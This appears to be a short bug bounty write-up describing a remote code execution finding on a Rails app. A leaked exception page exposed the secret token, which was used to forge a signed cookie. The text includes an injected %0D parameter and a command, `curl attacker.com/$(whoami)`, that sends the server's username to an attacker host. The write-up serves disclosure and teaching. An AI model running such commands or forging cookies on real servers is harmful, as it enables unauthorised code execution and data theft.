So a few days back i started testing a private BB program, I found a straightforward RCE on it. I choose'd to start hunting on the main web app i.e. https://app.redacted.com, While going through i found an endpoint which downloads a CSV report via redacted.redacted.com (In-scope asset). The filename and its content was defined in the request it self.
I was fuzzing around parameters, When i passed %0D to file_name the server threw an exception, The exception thrown because Rack's ShowExceptions was on.
It's more than something
As the the Rack's page suggests, "Be careful when you use this on public-facing sites as it could reveal information helpful to attackers", This must not be turned on on production environment. Rails (up to v4.0.2 NOT SURE) had a Secret token in /config/initializers/secret_token.rb. This token is used to verify the integrity of signed cookies (Any cookie set by your rails application is signed using this token), From Rails 4.0.2 this token is kept as environment variable `action_dispact.secret_token`. The exceptions page also leaks or better say includes this too. This token can be used to get RCE ( https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ ) You can read about this on the given link to understand and know how this works.
I quickly used the above code to generate a cookie to execute `curl attacker.com/$(whoami)` and got an request to attacker.com/app.
That's all folks :) Share/Retweet is much appreciated. Doubt? DM me at @rootxharsh
- 16 July : Bug found and Reported
- 16 July : Triaged
- 18 July : Fixed
- 20 July : $5000 Rewarded